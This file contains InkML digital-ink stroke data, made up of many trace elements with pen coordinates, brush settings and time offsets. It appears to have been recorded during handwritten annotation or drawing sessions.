  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27192.719">4601 7837,'40'-29,"-47"13,7 16,0 0,0 0,-41-3,41 3,0 0,-55 30,55-30,-13 65,51 1,-38-66,92 56,24-25,-26-37,-61-23,-59-32,-63 0,11 16,33 25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27484.7482">5250 7713,'103'-85,"-83"2,-63 16,-24 33,-3 37,21 55,33 45,31 21,15 18,-2-44,-9-30,1-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27659.7657">5298 7904,'-35'11,"-43"-11,78 0,-88-10,30-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27901.7899">5635 7496,'33'6,"-38"33,5-39,-16 104,-12 29,18-10,17-28,11-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28046.8044">5711 7969,'-30'-16,"-26"1,56 15,-77-10,3-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28514.8512">5832 7846,'25'4,"1"46,-26-50,18 74,5-3,5-24,-6-34,2-27,-13-38,-16-22,-7 1,8 47,15 29,33 49,2 0,-3-14,-14-35,4-21,-8-40,-4-7,-6 8,0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28905.8903">6588 7815,'-17'-3,"-43"10,60-7,-57 36,20 22,41 21,43-26,6-22,-3-45,-12-35,-2-12,-17 2,-10 48,4 26,-1 47,1 2,3-9,6-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29623.9621">6839 8131,'6'-20,"-2"-3,-4 23,0 0,0 0,-2-41,2 41,0 0,12-40,-12 40,20-58,26 12,4 9,11 26,-2 10,10 17,-20-9,-10 2,-25-4,-7-3,5 5,7 10,7 12,-14-17,-12-5,-1-1,9-4,20-6,-11-6,-7 1,-10 4,-1 6,-3 1,-8 3,-15 3,-4 7,0 15,10 5,12 2,35 18,16-3,15-14,11-27,3-30,-2-40,-18 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61667.1661">12481 7532,'36'-37,"-21"10,-15 27,0 0,0 0,6-16,-6 16,0 0,-10-7,10 7,-40 4,-55 7,95-11,-145 6,-30-18,-55-7,-17-2,-18 9,-42-8,14 5,24-5,1-3,55 10,70 10,62 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="82035.2027">23049 13148,'-68'-26,"-60"-37,-87 6,141 66,16 34,-3 17,-42-10,-33-37,-26-38,-34-37,-17 0,-5 28,5 36,20 55,16 28,-42 0,-31-27,-9-51,-51-38,-8-20,1 5,2 43,67 43,18 30,-12 4,-24-19,9-43,-50-40,-3-22,-4 2,-27 17,27 33,41 31,-4 20,4-13,5-22,-35-27,-4-31,0-12,-17 8,-13 24,-39 12,14 1,7-13,14-10,52-1,42 5</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2:57.568"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15083 6517,'42'-13,"-40"59,-2-46,24 94,14 38,-10 17,-5-11,-12-70,-13-60,-20-78,-20-79,8-38,34 11,42 91,30 49,12 32,-8 27,-26 12,-32 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="713.0713">15624 6858,'38'-21,"24"-8,-62 29,63-33,13-17,-19-18,-27 3,-36 23,-23 19,-4 17,-16 2,-11 7,6 13,18 5,25 18,1 27,2 29,12 18,13-4,20-21,21-36,-9-37,-9-50,-8-48,-22-55,-12-28,-34 56,17 51,19 48,18 48,23 81,2 28,6-21,4-31,-1-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1514.1514">16280 6533,'48'66,"-11"58,-6 6,-15-38,1-34,-13-39,1-37,-3-57,13-56,23-18,29 72,23 75,4 64,-31 48,-29 33,-34-31,-12-40,4-49</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1999.1999">17244 6755,'4'0,"-46"4,42-4,0 0,-84 6,84-6,-86 41,36 38,43 11,39-10,20-46,2-49,4-79,-16-69,-12-60,-53-15,-27 81,10 75,35 72,6 63,28 103,28 73,6-30,-1-41,2-49,-18-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2337.2337">17705 6779,'5'-1,"-23"-4,18 5,0 0,0 0,-30 3,30-3,0 0,-38 26,38-26,-34 55,35 20,37 0,25-41,-3-49,-20-60,-44-21,-42 2,-8 35,13 30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2890.289">18008 6748,'60'22,"-22"27,-38-49,15 59,-27-10,6-25,5-22,6-29,11-30,12-12,5-3,8 41,20 63,-10 42,-11 10,-13-13,-15-45,-4-29,8-50,2-28,24-18,-10 4,8 59,8 51,-7 54,-12 12,-16 3,-7-20,7-42</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3098.3098">18859 6582,'10'61,"5"31,0 5,-4-15,3-43,-9-45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3241.3241">18728 6455,'-25'-78,"8"1,24 25,3 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4251.4251">19125 6658,'24'-46,"23"8,-47 38,64-25,19 10,-13 31,-34 5,-27 43,-36 26,-33 30,4-20,50-48,58-7,32-29,32-22,24-3,-25-14,-32 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4640.464">20024 6767,'-29'0,"-43"28,72-28,-66 50,15 16,48-1,49-32,4-32,5-48,-13-21,5 24,0 49,21 62,-13 19,-12-4,-17-21,0-56,4-70,-11-70</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4996.4996">20320 6131,'8'-12,"13"30,-21-18,0 0,35 101,-35-101,29 170,5 34,4-38,15-36,4-56,-19-57,-32-62,-29-25,-15 0,-33 21,-9 9,-18 14,9 17,63 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5203.5203">20758 6652,'-3'31,"-12"53,15-84,-20 85,5-9,16-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5349.5349">20658 6465,'10'-50,"8"31,-18 19,0 0,48 22,-48-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5633.5633">21106 6700,'-16'35,"-13"13,29-48,-27 73,22 14,47-31,22-12,12-40,-17-25,-32-49,-44-5,-26 7,-17 34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5970.597">21431 6705,'42'13,"-10"42,-32-55,18 97,-14-7,1-32,3-35,18-53,6-32,21-22,30 14,14 53,19 69,9 44,-34 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15672.5671">8248 539,'16'21,"-38"48,22-69,-37 101,-19 33,-7 42,7 39,-5 60,6 69,18 62,2 38,21 64,18 22,20 23,-22 71,-30-3,-12 13,22-7,38 16,-2-21,-40-15,-34-49,3-59,0-15,29-111,40-52,60-80,55-88,68-60,-19-71,-59-49</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16842.6841">8209 8379,'-33'16,"-63"22,-37 29,-4 28,0 34,6 47,7 40,3 57,38 8,49 19,67 50,20-26,2 24,-37-40,-46-14,-58-59,-48-51,-60-36,-40-47,-56-48,-13-54,-5-25,13 0,81 17,47 5,73 10,76-4,40-5,54-7,29 0,-11-11,-6-4,-16-9,-50-6,-39 4,-49-7,-41 11,-7 15,10 25,19 15,38 31,42 27,64 36,41 26,-9-11,-35-16,-31-20,-34-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18708.8707">1991 6717,'-23'-17,"-53"35,76-18,-123 64,-20 32,-11 31,16 26,45 71,56 44,48 117,15 20,-7 102,-3-12,27 53,34-70,14 4,-3-69,4-6,25-133,56-101,56-105,3-78,-40-57,-76-45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19703.9702">1493 9215,'-58'-80,"-51"-27,13-35,13-28,6-61,21-30,15-41,11-86,10 21,12-21,33 5,58-28,13 47,-10-26,-19 11,0 15,3 47,2 36,10 20,-12 61,-29 53,-10 61,2 62,34 50,39 72,-18 15,-23 9,-27-22,-27-40,-5-45,-12-25,-19-43,-26-42,-17-25,9 23,12 48,-14 12,-26 7,-44 49,-66 19,-23 30,20-28,23 37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21001.0999">15511 9213,'85'-5,"-26"10,-11-5,15-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21144.1142">16625 9138,'198'-24,"-57"3,-11-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="21287.1285">18245 9059,'220'20,"-40"-3,-67-1</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3:54.251"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">8493 3525,'25'-8,"4"-5,-29 13,0 0,38-12,-38 12,53 3,42 15,8 20,22-11,-20-11,-2-18,-8-11,-7-18,-3-5,0 13,15 23,34 21,-2 10,4-8,-4-10,-8-11,-6-8,-16-8,-12-3,10-2,12 19,52 29,28 5,-12-5,24-16,-7-17,4-24,7-18,-17 2,-23 12,-14 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27067.7065">17006 2011,'-3'-36,"-17"0,20 36,0 0,-21-36,21 36,-18-25,10 18,9 53,8 53,-25 27,-63-39,-25-54,-43-50,-37-30,-35 2,-17 10,48 23,46 10,26 21,29 3,-6-4,-11-6,-32-6,-34-4,13-6,-5-7,-1 2,17 4,-4 14,-10 11,27 2</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4:50.902"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5942 2979,'20'-20,"-8"6,-12 14,0 0,41-34,-41 34,72-21,70 12,71 26,28 22,6-7,4-12,-7-24,-15-21,10-2,17 11,23 14,55 23,-11 10,-14-8,-4-14,9-25,-37-9,27-2,-5 19,1 9,22 6,-15 7,-39-5,26-13,-23-8,-12 5,21 4,-25 0,-18-3,-3 1,-24-2,-10 2,11 14,-5 11,-39-2,-27-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2134.2134">8128 4199,'1'-5,"6"0,-7 5,0 0,0 0,27-6,-27 6,0 0,85-8,-85 8,131 5,60 14,25 2,31-1,55-13,8-9,3-8,9-2,2 2,3 13,3 6,15 0,-10-3,-16-3,19-10,-20-3,-20 0,12 4,-41 3,-45 7,-34 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6144.6144">23574 6404,'60'70,"-9"33,-10 22,-9 28,-6 16,14 11,34 69,9 40,-17 36,-41-8,-67 8,-41-7,-18-19,-20-6,-7-34,6-31</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5:04.917"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">23015 518,'14'-25,"-4"7,-10 18,0 0,0 0,0 0,0 0,13-9,-13 9,0 0,0 0,0 0,10 1,-10-1,0 0,0 0,31 38,-31-38,0 0,51 42,-51-42,81 81,-11 21,-29 14,-6 43,-1 18,10 30,37 45,-18 10,-50-4,-48 35,-22 8,4-17,2 11,5-12,-2-32,-45-35,-25-47,-34-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14039.4038">17025 10832,'25'-21,"14"8,-39 13,0 0,55-7,-55 7,93 0,34 14,40 2,46-2,26-8,3-5,30 5,4-1,-13-15,4-9,-29-3,-35 18,2 19</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5:31.282"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4300 9478,'3'-37,"23"6,-26 31,89-24,58 1,51 10,65 11,40 2,0 5,3-2,-19 12,38 21,22 12,-19-6,-18-15,-41-28,0-27,0-5,10 13,17 15,19 11,38 1,-43-8,-5 5,19-13,-22-1,-24-7,-4-7,-26 15,28 23,15 9,-19 0,-6-10,-37-20,-18-15,-3-13,6 6,25 17,31 13,12 3,23-9,-25-6,28-2,25 10,59 17,6 11,-17 4,-4-12,-40-8,-15-5,8 0,-64 2,-75 7</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6:02.120"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">13258 8974,'11'-10,"-4"6,-7 4,0 0,0 0,3 2,-3-2,0 0,1 13,-1-13,6 58,9 69,12 60,-4 30,-22-5,-5-36,-10-27,0-16,10-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="739.0739">13369 9116,'24'-5,"4"18,-28-13,0 0,41 50,-41-50,70 92,3 19,-20-33,-44-50,-16-42,-29-65,-19-44,-24 0,2 55,-7 33,-7 27,-8 41,19 23,8 19,9 2,-9 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37:47.19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7030A0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4432 977,'0'-23,"-10"4,10 19,0 0,0 0,0 0,0 0,0 0,-7-24,7 24,0 0,0 0,0 0,0 0,5-24,-5 24,0 0,0 0,0 0,5-15,-5 15,0 0,0 0,-6-6,6 6,0 0,-28 2,28-2,-60 8,-7 3,-13 36,-18 31,-6 27,-35 62,30 31,55 0,61 0,78-27,30-28,43-45,11-49,-2-49,-6-55,-29-42,-70 17,-38 4,-55 4,-60 3,-35 20,5 18,51 23,19 26,48 7,32 9,37 5,32-5,24 3,-21-6,-22 36,-35 24,-39 2,-2 5,-12-33,16-39,-3-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="609.0609">5390 1981,'23'-21,"-51"-14,28 35,0 0,-74-43,74 43,-93-34,5 45,36 26,20 31,37 12,17-4,38-15,-6-23,2-25,-19-47,-16-30,-14 16,-8 9,3 11,-3 15,2 15,9 41,19 30,-23 22,-23-23,-2-12,15-27,3-25,17-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="898.0898">5729 2445,'26'-6,"-28"-29,2 35,0 0,-35-61,35 61,-41-86,14 8,36 0,33 6,30 21,18 22,16 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1481.1481">6232 1210,'-1'59,"-8"45,2 71,18 47,21 24,23-60,-12-41,-11-72,-25-63,2-68,28-52,30-28,-9 69,8 77,-1 53,-19 28,-28 23,-40-16,-32-45,-41-59,-29-26,28-27,65 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1882.1882">7211 2185,'50'-23,"-72"-3,22 26,0 0,-62-27,62 27,-89 9,20 30,44 21,49-2,14-5,7-32,-12-28,10-35,-16 12,11 16,0 54,-2 37,-14-7,-14-28,-3-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2621.2621">7934 2066,'6'1,"-36"4,30-5,0 0,-69 37,69-37,-67 62,25 18,54-11,14-26,12-33,1-20,16-16,-7 24,19 43,10 61,-23 58,-39-22,-60-36,-36-52,-2-66,19-43,51-37,47-16,82-8,31 29,2 43,-24 19,-53-14,-47-19,-53-9,-40 34,-5 60,8 59,51 24,47-4,41-32,27-38,39-69</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3060.306">10677 1375,'24'-40,"-67"-3,43 43,-107-31,-14 31,-7 62,25 73,25 85,70 23,41-44,21-39,19-65,11-53,52-84</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3331.3331">10978 2003,'-19'-16,"-50"13,69 3,-81 53,19 46,80 24,39-4,18-54,-3-70,-41-75,-44-63,-18 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3645.3645">11500 1312,'22'61,"-40"71,-12 63,-9 42,29-27,16-50,11-81,24-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3913.3913">11930 1207,'14'62,"-19"85,-28 58,-1-3,19-13,17-54,6-47,10-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4235.4235">12164 2211,'115'12,"-7"-24,-33-32,-56-40,-40-33,-30 27,-8 74,7 61,16 51,35 21,46 11,39-23,7-36,25-62,16-48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4491.4491">13300 1967,'14'11,"-41"7,27-18,0 0,-64 51,64-51,-72 63,35 16,57 32,46-6,20-32,17-57</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4746.4746">13934 1466,'28'94,"-21"85,-21 48,-7 34,22-53,19-75,9-73</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4923.4923">14133 2143,'-9'-5,"-45"20,54-15,-95 6,-47-34,32-11,52 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5146.5146">14554 2149,'-3'43,"-49"55,10-5,13-9,29-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5288.5288">14605 1887,'6'-75,"0"49,-6 26,0 0,25-10,-25 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5560.556">15134 2239,'-45'14,"-37"19,12 19,50 33,64 16,28-24,16-47,-17-64,-39-65,-46-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5925.5925">15511 2212,'26'66,"-37"36,-9 5,16-35,18-35,8-43,7-58,14-36,17-2,1 58,25 98,-3 93,-23 39,-26 36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6924.6924">7555 4853,'35'-53,"-9"-47,-31-74,-15-32,14-30,11 39,17 83,5 94,30 68,41 125,-12 61,-17-10,-17-70,-12-61</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7086.7086">8019 4468,'-37'-39,"-6"34,43 5,-55 4,-20 17,14 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7342.7342">8071 4416,'72'-26,"-14"47,-58-21,60 61,-17 15,-4-19,-2-36,15-38,-2-60,-23-32,-11-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7533.7533">8701 3919,'31'92,"-21"39,-12 30,4-9,16-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7677.7677">8901 4613,'-32'-77,"-40"9,-16 25,-14 23,20 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7997.7997">9169 4384,'-14'9,"-41"41,55-50,-41 79,49 0,72 3,15-33,-15-53,-41-34,-44-50,-39-23,14 45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8530.853">9509 4442,'67'45,"-25"23,-31 17,-13-25,-2-16,20-29,3-30,-11-30,2-27,13-10,7 7,2 46,21 58,-2 41,-22-11,-14-25,-5-26,8-41,14-39,11 11,7 10,2 37,-5 56,-18 40,-15 1,-14-24,20-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="8971.8971">10630 4374,'28'-17,"-27"16,-1 1,0 0,0 0,-31 27,31-27,0 0,-72 51,72-51,-76 66,10 31,59-4,52-15,24-40,-4-54,-17-41,-16-36,-28-8,-8 40,4 57,-2 43,7 55,4 0,-1 1,-2-57,33-52</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9195.9195">10921 3840,'31'24,"-22"87,-20 69,-15 45,3 6,26-76,28-67</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9354.9354">11047 4438,'-19'19,"-39"19,58-38,-87 31,22-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9559.9559">11386 4446,'28'57,"-29"31,-13-3,19-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9704.9704">11438 4417,'-7'-104,"-10"10,6 39,36 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9944.9944">11904 4383,'-6'15,"-44"27,50-42,-72 70,30-2,46 3,60 2,36-37,6-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10526.0525">12822 4808,'49'24,"-32"-47,-17 23,0 0,-5-82,5 82,-17-131,3-30,19-17,19 13,5 92,17 74,12 97,-7 46,0-6,-10-42,-8-56,-6-69,-12-68,2-47,19-21,10 14,1 72,-2 87,1 80,-30 81,-32 52,-8-18,-3-50,24-70</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10864.0863">13769 4619,'45'1,"-4"-21,-41 20,34-53,-10-26,-24 8,-17 33,-26 51,-10 55,2 26,16 0,42-10,48-4,27-45,15-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11368.1367">14141 4615,'28'-58,"-8"56,-20 2,0 0,0 0,18 65,-18-65,0 0,5 96,-5-96,-9 90,3-41,4-34,12-25,12-44,0-11,19-11,-4 14,-11 51,5 53,-11 32,-8-15,-9-22,-3-31,5-27,11-49,7 7,10 5,-5 33,4 46,-12 43,-7-2,-12-17,11-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11676.1675">14838 4597,'38'-35,"-29"23,-9 12,0 0,0 0,-20-1,20 1,0 0,-54 28,54-28,-56 75,38 18,57 5,36-30,0-62,-22-57,-29-39,-29-2,-17 17,3 29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11866.1865">15224 4902,'38'-1,"-19"-60,-19 61,-9-113,8 10,19 21,23 31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12221.222">15600 4498,'30'100,"-20"19,7-20,2-43,33-31,5-42,-2-33,-6-5,-9 19,0 18,1 53,-17 57,-26 29,-33 21,-21-32,5-55</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12836.2835">16665 4934,'10'9,"-22"-41,12 32,0 0,-7-102,7 102,-18-140,20-19,6 7,10 46,22 87,27 85,4 51,-1-3,-9-26,-13-46,-13-68,-3-71,-8-29,16-6,0 24,3 72,2 88,-7 89,-27 45,-27 16,2-67,19-60</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13236.3235">17730 4558,'-10'25,"-44"18,54-43,-86 77,36 9,43 2,41-5,10-45,-1-60,-9-43,-24-33,-9 1,-5 36,7 64,8 87,-8 27,-8-7,2-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13619.3618">17875 4722,'35'76,"-35"9,-15-13,3-36,6-26,17-21,14-38,7-18,2 3,12 2,-17 38,-8 63,-2 49,-18-5,0-12,6-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14018.4017">18485 4716,'-3'2,"-34"20,37-22,0 0,-56 39,56-39,-42 55,21 7,43-8,18-14,22-27,-7-39,-12-19,-17-10,-10 29,-10 37,1 57,0-1,6-16,21-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15783.5782">18896 4832,'17'-43,"-10"26,-7 17,0 0,0 0,-21 8,21-8,0 0,-46 21,46-21,-61 39,18 5,40 9,28-18,10-8,13-12,-4-10,-15 1,-1 43,-12 30,-12 27,-24-6,-19-27,1-42,14-38,35-33,19-39,29-22,17-11,8-23,-37 16,-30 34,-26 20,-22 41,-7 79,11 55,29 45,38-23,23-32,11-59,3-70,-10-39,5-29,-4-6,-14 50,0 76,-23 70,-8 8,-15 1,-5-54,2-34,9-44,18-58,3-5,5 15,27-22,-17 36,-6 50,-8 41,-14 32,-8-6,-13-16,2-31,18-7,16-17,12 1,-11 18,-6 16,-16 55,-6-2,-5-28,14-17,20-42,7-26,5-13,-2-6,-15-6,-20 1,-2 5,-11 6,-18 14,-12 25,-16 31,7 16,7 33,40 16,34 9,15-18,14-21,4-36,1-30,-16-58,2-16,-15 17,-6 31,-15 60,-8 66,-16 33,-7-4,-4-39,4-50,12-41,23-55,10-23,0 13,11 23,-15 54,-7 74,-15 40,-8-9,-4-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16037.6036">21398 4571,'22'-174,"-3"58,-17 91,1 44,-24 103,8 62,-7 80,35-62,13-72,12-59</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="16208.6207">21667 4828,'-10'-9,"-40"10,50-1,-98-15,-47-8,-23 5,-25 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="31888.1885">7244 6112,'-24'95,"-10"49,9 65,8 45,2 49,-5 65,0 61,-17 45,-4 38,-14 66,13-55,-13-6,-6-32,1-29,-7-89,0-85,-4-86</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32627.2624">4153 5880,'22'119,"-11"93,-43 59,-34 74,-15 21,3 56,26 30,33 46,17 25,5 30,-3 7,-17-38,-17-48,0-99,6-91,19-103,12-83</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33124.3121">6846 11212,'-107'8,"-97"-13,-78-20,-46-16,-43-14,22-2,47 6,96 7,73-4,111-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33465.3462">7210 10235,'-33'-37,"-126"16,-142-5,-60-3,-89-16,-29 3,-12-10,38 3,74 14,156-8,145-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33812.3809">6768 8715,'-142'-5,"-150"-6,-39-2,-71-26,-29-10,7-1,26 8,62-10,121 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34138.4135">6701 7785,'-85'-32,"-171"-2,-106 6,-70-9,-108 7,70 13,65-2,105-3,123-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34466.4463">7133 6782,'54'-62,"-75"13,21 49,-128-58,-135-15,-85 9,-106 0,-40-4,-30-2,38 16,72 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="35626.5623">5504 8007,'-2'2,"-4"27,6-29,0 0,0 0,6 36,-6-36,0 0,27 47,-27-47,22 23,-10-30,-5-24,-22-6,-9 8,-1 21,12 23,11 25,12 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38830.8827">5599 7982,'-8'-30,"-8"16,16 14,0 0,0 0,-19-7,19 7,0 0,-14 3,14-3,4 19,34 42,-38-61,93 81,37-6,37-15,50-8,14-6,26-10,17-19,25-32,13-30,45-31,-2-23,-10-16,7-10,-3 5,24-1,5 9,38 9,-70 46,-53 23,-87 6,-85 10,-68 22,-36 25,-14 50,-42 17,-8 5,-7-4,25-34,29-31,20-31,28-50,7-52,-2-51,-21 14,-20 53,-25 19,-29 6,-42 12,-24 4,-25 20,32 1,27 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39312.9309">12328 6573,'7'110,"-34"58,-8 58,10 50,12-18,-4-3,8-22,-7-50,13-61,16-65,19-62,12-84</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40208.0204">12597 6588,'111'-84,"-37"20,21 12,69 17,79 6,42-1,60 10,44 6,22 12,30 24,-31 14,-36 2,-49-2,-38-4,-70-2,-79-9,-70-5,-44 5,-27 17,-19 21,-9 19,-4 30,29 47,35 44,13 30,7 19,-26-16,-43-41,-48-28,-63-40,-77-38,-75-42,-96-23,-50-16,-53-2,-15 0,-33-9,27 5,68 5,101 3,89-5,134 3,67-1,30 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42500.2496">12358 9689,'30'-92,"-19"11,-7 20,-4 48,5 46,1 75,2 67,-9 42,6 39,-3 14,1 12,1-5,20-45,2-49,3-83,2-76</inkml:trace>
